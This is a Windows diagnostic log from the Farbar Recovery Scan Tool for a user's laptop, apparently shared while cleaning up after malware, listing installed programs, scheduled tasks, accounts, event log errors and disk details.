2014-10-31 14:58 - 2014-04-12 01:42 - 00129752 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-10-30 20:43 - 2013-01-18 22:39 - 00708608 ___SH () C:\Users\Ryan\Desktop\Thumbs.db
2014-10-30 06:25 - 2010-11-20 22:27 - 00275080 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
2014-10-29 15:49 - 2014-04-12 01:42 - 00001113 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-10-29 15:49 - 2014-04-12 01:42 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-10-29 15:49 - 2014-04-12 01:42 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-10-22 16:31 - 2013-10-27 14:17 - 00003872 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1987813687-3303645166-2786259458-1001UA
2014-10-22 16:31 - 2013-10-27 14:17 - 00003476 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1987813687-3303645166-2786259458-1001Core
2014-10-21 10:22 - 2012-08-28 22:49 - 00000000 ____D () C:\Users\Ryan\AppData\Local\Microsoft Help
2014-10-15 18:46 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\rescache
2014-10-15 15:38 - 2013-10-25 17:22 - 00000000 ____D () C:\ProgramData\Oracle
2014-10-15 15:29 - 2009-07-14 00:09 - 00000000 ____D () C:\Windows\System32\Tasks\WPD
2014-10-15 15:27 - 2009-07-13 23:45 - 00342240 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-10-15 15:25 - 2014-05-06 23:19 - 00000000 ___SD () C:\Windows\system32\CompatTel
2014-10-15 15:25 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\SysWOW64\Dism
2014-10-15 15:25 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\system32\Dism
2014-10-15 02:01 - 2012-08-28 22:49 - 00000000 ____D () C:\ProgramData\Microsoft Help
2014-10-15 01:57 - 2014-05-09 16:11 - 00000000 ____D () C:\Windows\system32\MRT
2014-10-15 01:54 - 2014-05-09 16:11 - 103265616 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe
2014-10-13 16:36 - 2012-09-17 11:31 - 00000000 ____D () C:\Users\Ryan\Documents\Personal Statement Docs
2014-10-13 15:01 - 2013-02-09 15:54 - 00000000 ____D () C:\Users\Ryan\Documents\Poems
2014-10-12 22:37 - 2012-08-05 23:51 - 00000000 ____D () C:\Users\Ryan\AppData\Roaming\Skype
Some content of TEMP:
====================
C:\Users\Ryan\AppData\Local\Temp\dllnt_dump.dll
C:\Users\Ryan\AppData\Local\Temp\Quarantine.exe
==================== Bamital & volsnap Check =================
(There is no automatic fix for files that do not pass verification.)
C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed
LastRegBack: 2014-11-05 19:02
==================== End Of Log ============================
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 02-11-2014
Ran by Ryan at 2014-11-07 18:14:02
Running from C:\Users\Ryan\Desktop
Boot Mode: Normal
==========================================================
==================== Security Center ========================
(If an entry is included in the fixlist, it will be removed.)
AV: Microsoft Security Essentials (Enabled - Up to date) {4F35CFC4-45A3-FC37-EF17-759A02E39AB1}
AS: Microsoft Security Essentials (Enabled - Up to date) {F4542E20-6399-F3B9-D5A7-4EE87964D00C}
AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
==================== Installed Programs ======================
(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
Adobe Flash Player 15 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 15.0.0.167 - Adobe Systems Incorporated)
Adobe Reader X (10.1.12) MUI (HKLM-x32\...\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}) (Version: 10.1.12 - Adobe Systems Incorporated)
Apple Application Support (HKLM-x32\...\{AAC5D43E-816D-4C2D-8E51-55FFF35BE301}) (Version: 3.0.1 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{787136D2-F0F8-4625-AA3F-72D7795AC842}) (Version: 7.1.1.3 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
Atheros Bluetooth Suite (64) (HKLM\...\{230D1595-57DA-4933-8C4E-375797EBB7E1}) (Version: 7.4.0.122 - Atheros)
Atheros WLAN Client Installation Program (HKLM-x32\...\{28006915-2739-4EBE-B5E8-49B25D32EB33}) (Version: 7.0 - Atheros)
Audacity 2.0.5 (HKLM-x32\...\Audacity_is1) (Version: 2.0.5 - Audacity Team)
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
Cirrus Logic Audio (HKLM-x32\...\{3A69FD31-5EE7-42C9-918B-81C07AA21043}) (Version: 10.14.0.0 - Cirrus Logic)
Cirrus Logic Audio x64 (Version: 7.25.38.0 - Cirrus Logic) Hidden
Common Desktop Agent (Version: 1.62.0 - OEM) Hidden
Control ActiveX de Windows Live Mesh para conexiones remotas (HKLM-x32\...\{04668DF2-D32F-4555-9C7E-35523DCD6544}) (Version: 15.4.5722.2 - Microsoft Corporation)
Contrôle ActiveX Windows Live Mesh pour connexions à distance (HKLM-x32\...\{55D003F4-9599-44BF-BA9E-95D060730DD3}) (Version: 15.4.5722.2 - Microsoft Corporation)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
Galería fotográfica de Windows Live (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Galerie de photos Windows Live (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Garmin ANT Agent (HKLM\...\{20B0E07B-12EA-4BAB-A3B1-E17D7568EB6F}) (Version: 2.3.4 - Garmin Ltd or its subsidiaries)
Garmin USB Drivers (HKLM-x32\...\{3D5D6CFC-3097-425A-8D8F-7EAF5D57641D}) (Version: 2.3.1.0 - Garmin Ltd or its subsidiaries)
GIMP 2.8.2 (HKLM\...\GIMP-2_is1) (Version: 2.8.2 - The GIMP Team)
Google Talk Plugin (HKLM-x32\...\{95763F66-297E-30CE-9728-6D0F20BF97F5}) (Version: 5.38.5.0 - Google)
GoToMeeting 5.3.0.1009 (HKCU\...\GoToMeeting) (Version: 5.3.0.1009 - CitrixOnline)
Intel(R) Manageability Engine Firmware Recovery Agent (HKLM-x32\...\{A6C48A9F-694A-4234-B3AA-62590B668927}) (Version: 1.0.0.36279 - Intel Corporation)
Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 8.0.10.1464 - Intel Corporation)
Intel(R) OpenCL CPU Runtime (HKLM-x32\...\{FCB3772C-B7D0-4933-B1A9-3707EBACC573}) (Version: - Intel Corporation)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 8.15.10.2752 - Intel Corporation)
Intel(R) Rapid Storage Technology (HKLM-x32\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 11.1.0.1006 - Intel Corporation)
Intel(R) USB 3.0 eXtensible Host Controller Driver (HKLM-x32\...\{240C3DDD-C5E9-4029-9DF7-95650D040CF2}) (Version: 1.0.4.220 - Intel Corporation)
iTunes (HKLM\...\{B8BA155B-1E75-405F-9CB4-8A99615D09DC}) (Version: 11.1.5.5 - Apple Inc.)
Java 7 Update 71 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F03217071FF}) (Version: 7.0.710 - Oracle)
Junk Mail filter update (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
LAME v3.99.3 (for Windows) (HKLM-x32\...\LAME_is1) (Version: - )
Malwarebytes Anti-Malware version 2.0.3.1025 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.3.1025 - Malwarebytes Corporation)
Mesh Runtime (x32 Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Microsoft .NET Framework 4.5.1 (español) (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 3082) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft .NET Framework 4.5.1 (Français) (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1036) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft Office Home and Student 2010 (HKLM-x32\...\Office14.SingleImage) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 4.6.305.0 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
NVIDIA Graphics Driver 296.28 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 296.28 - NVIDIA Corporation)
NVIDIA PhysX System Software 9.12.0213 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.12.0213 - NVIDIA Corporation)
Perfect Photo Suite 7.0.1 (HKLM-x32\...\{6727F16E-6BF0-4E73-AC73-958A382AA09E}) (Version: 7.0.1 - onOne Software)
Premium Sound HD (HKLM\...\{3007FF9F-5B2C-41FF-8BFC-08BF25DB2681}) (Version: 1.12.3000 - SRS Labs, Inc.)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.52.203.2012 - Realtek)
Realtek USB 2.0 Card Reader (HKLM-x32\...\{96AE7E41-E34E-47D0-AC07-1091A8127911}) (Version: 6.1.7601.30130 - Realtek Semiconductor Corp.)
Samsung Easy Printer Manager (HKLM-x32\...\Samsung Easy Printer Manager) (Version: 1.05.21.00(2/3/2014) - Samsung Electronics Co., Ltd.)
Samsung Easy Wireless Setup (HKLM-x32\...\Easy Wireless Setup) (Version: 3.60.40.03 - Samsung Electronics Co., Ltd.)
Samsung Printer Live Update (HKLM-x32\...\Samsung Printer Live Update) (Version: 1.01.00:04(2013-04-22) - Samsung Electronics Co., Ltd.)
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{DE28B448-32E8-4E8F-84F0-A52B21A49B5B}) (Version: - Microsoft)
SES Driver (HKLM\...\{D8CC254C-C671-4664-9A38-FA368D1E2C97}) (Version: 1.0.0 - Western Digital)
Skype™ 6.20 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 6.20.104 - Skype Technologies S.A.)
Tweaking.com - Registry Backup (HKLM-x32\...\Tweaking.com - Registry Backup) (Version: 1.10.1 - Tweaking.com)
USB3Setup (HKLM-x32\...\{4814105D-5756-4CD7-9430-ADA474A3E192}) (Version: 1.0.4.220 - VIZIO)
VIZIO Wireless Driver (HKLM-x32\...\{3A9C1D7A-A227-442F-B296-14AEBC4E85C1}) (Version: 1.00.0001 - VIZIO)
VIZIO Wireless Touchpad (HKLM-x32\...\{3F0E78CA-735E-446D-8E60-69C6CA27EC95}) (Version: 1.00.0001 - VIZIO)
VIZIO_FN_Key_Utility (HKLM-x32\...\{106AEB0E-1FF7-44BD-B510-6CF9A3934FAC}) (Version: 1.3.15 - VIZIO)
VIZIOUtility version 1.0 (HKLM-x32\...\{4F949BD9-1E99-40C7-9102-C67E2D384995}_is1) (Version: 1.0 - VIZIO)
VLC media player 2.1.3 (HKLM-x32\...\VLC media player) (Version: 2.1.3 - VideoLAN)
Windows Driver Package - Dynastream Innovations (libusb0) LibUsbDevices (07/07/2009 1.12.2) (HKLM\...\24DA573F901348FFDFF7717497830D45BE0C362E) (Version: 07/07/2009 1.12.2 - Dynastream Innovations)
Windows Driver Package - Garmin (grmnusb) GARMIN Devices (04/19/2012 2.3.1.0) (HKLM\...\98157A226B40B173301B0F53C8E98C47805D5152) (Version: 04/19/2012 2.3.1.0 - Garmin)
Windows Driver Package - Silicon Labs Software (DSI_SiUSBXp_3_1) USB (02/06/2007 3.1) (HKLM\...\D1506E0025B5A3F9EB8270FE81C1EEDD9388B8A2) (Version: 02/06/2007 3.1 - Silicon Labs Software)
Windows Driver Package - Western Digital Technologies (WDC_SAM) WDC_SAM (01/19/2011 1.0.0009.0) (HKLM\...\4CA7CFBB29889F25ACB3DF6E3A42BAE29EB43B20) (Version: 01/19/2011 1.0.0009.0 - Western Digital Technologies)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3555.0308 - Microsoft Corporation)
Windows Live Mesh ActiveX Control for Remote Connections (HKLM-x32\...\{2902F983-B4C1-44BA-B85D-5C6D52E2C441}) (Version: 15.4.5722.2 - Microsoft Corporation)
Zune (HKLM\...\Zune) (Version: 04.07.1404.01 - Microsoft Corporation)
==================== Custom CLSID (selected items): ==========================
(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)
CustomCLSID: HKU\S-1-5-21-1987813687-3303645166-2786259458-1001_Classes\CLSID\{0F22A205-CFB0-4679-8499-A6F44A80A208}\InprocServer32 -> C:\Users\Ryan\AppData\Local\Google\Update\1.3.25.5\psuser_64.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-1987813687-3303645166-2786259458-1001_Classes\CLSID\{84B5A313-CD5D-4904-8BA2-AFDC81C1B309}\InprocServer32 -> C:\Program Files (x86)\Citrix\GoToMeeting\1009\G2MOutlookAddin64.dll (Citrix Online, a division of Citrix Systems, Inc.)
CustomCLSID: HKU\S-1-5-21-1987813687-3303645166-2786259458-1001_Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Users\Ryan\AppData\Local\Google\Update\1.3.25.5\psuser_64.dll (Google Inc.)
==================== Restore Points =========================
02-11-2014 03:30:39 End of disinfection
03-11-2014 22:05:12 Windows Update
07-11-2014 02:21:37 Windows Update
==================== Hosts content: ==========================
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
2009-07-13 21:34 - 2014-11-03 15:18 - 00000027 ____A C:\Windows\system32\Drivers\etc\hosts
127.0.0.1 localhost
==================== Scheduled Tasks (whitelisted) =============
(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)
Task: {372C798C-A5B3-4AA4-BBF2-B7E73240D486} - System32\Tasks\ISM-UpdateService-4e00205a-2ab1-4423-8f77-cc25b82cde1d-Logon => c:\Program Files (x86)\Intel\Intel(R) ME FW Recovery Agent\bin\Bootstrap.exe [2012-03-26] (Intel Corporation)
Task: {503D3F2D-3467-4AD0-AB8F-6DC6CC77FC61} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1987813687-3303645166-2786259458-1001UA => C:\Users\Ryan\AppData\Local\Google\Update\GoogleUpdate.exe [2013-10-27] (Google Inc.)
Task: {795C9DD4-84DD-4612-B8E5-6C26954A7C70} - System32\Tasks\ISM-UpdateService-4e00205a-2ab1-4423-8f77-cc25b82cde1d => c:\Program Files (x86)\Intel\Intel(R) ME FW Recovery Agent\bin\Bootstrap.exe [2012-03-26] (Intel Corporation)
Task: {7A4BB95A-5FCC-432C-90F8-E7E4AB110F1C} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1987813687-3303645166-2786259458-1001Core => C:\Users\Ryan\AppData\Local\Google\Update\GoogleUpdate.exe [2013-10-27] (Google Inc.)
Task: {C5E1112F-43F2-4BEE-99A2-79ADA35DF515} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2014-09-23] (Adobe Systems Incorporated)
Task: {F741AF84-829D-46EF-8DB7-4841CBC7DCCE} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1987813687-3303645166-2786259458-1001Core.job => C:\Users\Ryan\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1987813687-3303645166-2786259458-1001UA.job => C:\Users\Ryan\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\ISM-UpdateService-4e00205a-2ab1-4423-8f77-cc25b82cde1d-Logon.job => c:\Program Files (x86)\Intel\Intel(R) ME FW Recovery Agent\bin\Bootstrap.exe
Task: C:\Windows\Tasks\ISM-UpdateService-4e00205a-2ab1-4423-8f77-cc25b82cde1d.job => c:\Program Files (x86)\Intel\Intel(R) ME FW Recovery Agent\bin\Bootstrap.exe
==================== Loaded Modules (whitelisted) =============
2011-04-25 10:24 - 2011-04-25 10:24 - 00034304 _____ () C:\Windows\System32\ssj1mlm.dll
2012-04-27 17:43 - 2012-03-19 17:09 - 00094208 _____ () C:\Windows\System32\IccLibDll_x64.dll
2012-03-09 08:58 - 2012-03-09 08:58 - 00462712 _____ () C:\Program Files\Common Files\Common Desktop Agent\CDASrv.exe
2012-03-09 08:58 - 2012-03-09 08:58 - 00057208 _____ () C:\Program Files\Common Files\Common Desktop Agent\CDASrvPS.dll
2012-04-17 11:20 - 2012-04-17 11:20 - 00293376 _____ () C:\Program Files (x86)\VIZIO\VIZIO_FN_Key_Utility\vCapture64.dll
2012-03-28 13:15 - 2012-03-28 13:15 - 00013824 _____ () C:\Program Files (x86)\VIZIO\VIZIO_FN_Key_Utility\WMI_DLL64.dll
2012-04-27 17:03 - 2012-03-28 09:36 - 00128280 _____ () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe
2014-01-20 13:17 - 2014-01-20 13:17 - 00073544 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
2014-01-20 13:16 - 2014-01-20 13:16 - 01044808 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
2012-05-18 18:30 - 2012-05-03 16:56 - 00089600 _____ () C:\Program Files (x86)\VIZIO\VIZIO Wireless Touchpad\FspLib.dll
2012-05-18 18:30 - 2012-05-03 11:48 - 00093696 _____ () C:\Program Files (x86)\VIZIO\VIZIO Wireless Touchpad\move_ctrl.dll
2012-05-18 18:30 - 2012-04-20 18:11 - 00034816 _____ () C:\Program Files (x86)\VIZIO\VIZIO Wireless Touchpad\KbdHook.dll
2012-05-18 18:30 - 2012-03-15 12:19 - 00241664 _____ () C:\Program Files (x86)\VIZIO\VIZIO Wireless Touchpad\vCapture.dll
2012-04-27 17:03 - 2012-03-28 09:18 - 01198872 _____ () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\ACE.dll
==================== Alternate Data Streams (whitelisted) =========
(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)
AlternateDataStreams: C:\Windows:nlsPreferences
==================== Safe Mode (whitelisted) ===================
(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\ESETOlmarikOlmascoCleaner => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\ESETOlmarikOlmascoCleaner.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ESETOlmarikOlmascoCleaner => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ESETOlmarikOlmascoCleaner.sys => ""="Driver"
==================== EXE Association (whitelisted) =============
(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)
==================== MSCONFIG/TASK MANAGER disabled items =========
(Currently there is no automatic fix for this section.)
========================= Accounts: ==========================
Administrator (S-1-5-21-1987813687-3303645166-2786259458-500 - Administrator - Disabled)
Guest (S-1-5-21-1987813687-3303645166-2786259458-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-1987813687-3303645166-2786259458-1003 - Limited - Enabled)
Ryan (S-1-5-21-1987813687-3303645166-2786259458-1001 - Administrator - Enabled) => C:\Users\Ryan
UpdatusUser (S-1-5-21-1987813687-3303645166-2786259458-1000 - Limited - Enabled) => C:\Users\UpdatusUser
==================== Faulty Device Manager Devices =============
==================== Event log errors: =========================
Application errors:
==================
Error: (11/07/2014 03:59:00 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 9984
Error: (11/07/2014 03:59:00 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 9984
Error: (11/07/2014 03:59:00 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second
Error: (11/06/2014 08:09:31 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 9922
Error: (11/06/2014 08:09:31 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 9922
Error: (11/06/2014 08:09:31 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second
Error: (11/06/2014 04:11:51 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
Error: (11/05/2014 05:45:53 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3011) (User: NT AUTHORITY)
Description: Unloading the performance counter strings for service WmiApRpl (WmiApRpl) failed. The first DWORD in the Data section contains the error code.
Error: (11/05/2014 05:45:53 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: NT AUTHORITY)
Description: The performance strings in the Performance registry value is corrupted when process Performance extension counter provider. The BaseIndex value from the Performance registry is the first DWORD in the Data section, LastCounter value is the second DWORD in the Data section, and LastHelp value is the third DWORD in the Data section.
Error: (11/05/2014 05:41:08 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
System errors:
=============
Error: (11/07/2014 03:53:51 PM) (Source: BTHUSB) (EventID: 17) (User: )
Description: The local Bluetooth adapter has failed in an undetermined manner and will not be used. The driver has been unloaded.
Error: (11/07/2014 01:39:10 AM) (Source: BTHUSB) (EventID: 17) (User: )
Description: The local Bluetooth adapter has failed in an undetermined manner and will not be used. The driver has been unloaded.
Error: (11/06/2014 09:11:04 PM) (Source: BTHUSB) (EventID: 17) (User: )
Description: The local Bluetooth adapter has failed in an undetermined manner and will not be used. The driver has been unloaded.
Error: (11/06/2014 04:11:26 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: The following boot-start or system-start driver(s) failed to load:
cdrom
Error: (11/05/2014 05:40:52 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: The following boot-start or system-start driver(s) failed to load:
cdrom
Error: (11/04/2014 10:19:29 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: The following boot-start or system-start driver(s) failed to load:
cdrom
Error: (11/04/2014 03:29:58 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: The following boot-start or system-start driver(s) failed to load:
cdrom
Error: (11/04/2014 03:24:36 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: The following boot-start or system-start driver(s) failed to load:
cdrom
Error: (11/04/2014 00:41:25 AM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: The following boot-start or system-start driver(s) failed to load:
cdrom
Error: (11/03/2014 09:32:20 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: The following boot-start or system-start driver(s) failed to load:
cdrom
Microsoft Office Sessions:
=========================
Error: (11/07/2014 03:59:00 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 9984
Error: (11/07/2014 03:59:00 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 9984
Error: (11/07/2014 03:59:00 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second
Error: (11/06/2014 08:09:31 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 9922
Error: (11/06/2014 08:09:31 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 9922
Error: (11/06/2014 08:09:31 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second
Error: (11/06/2014 04:11:51 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
Error: (11/05/2014 05:45:53 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3011) (User: NT AUTHORITY)
Description: WmiApRplWmiApRpl8F20300004D070000
Error: (11/05/2014 05:45:53 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: NT AUTHORITY)
Description: Performance1637070000000000000000000009030000
Error: (11/05/2014 05:41:08 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
CodeIntegrity Errors:
===================================
Date: 2014-11-03 15:18:28.899
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2014-11-03 15:18:28.884
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
==================== Memory info ===========================
Processor: Intel(R) Core(TM) i7-3610QM CPU @ 2.30GHz
Percentage of memory in use: 23%
Total physical RAM: 8085.95 MB
Available physical RAM: 6189.85 MB
Total Pagefile: 16170.07 MB
Available Pagefile: 13540.86 MB
Total Virtual: 8192 MB
Available Virtual: 8191.83 MB
==================== Drives ================================
Drive c: (WINDOWS) (Fixed) (Total:919.21 GB) (Free:829.65 GB) NTFS
==================== MBR & Partition Table ==================
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: 868B7EFA)
Partition 1: (Active) - (Size=600 MB) - (Type=27)
Partition 2: (Not Active) - (Size=919.2 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=11.7 GB) - (Type=27)
==================== End Of Log ============================
Malwarebytes Anti-Rootkit BETA 1.08.0.1001
www.malwarebytes.org
Database version: v2014.11.07.06
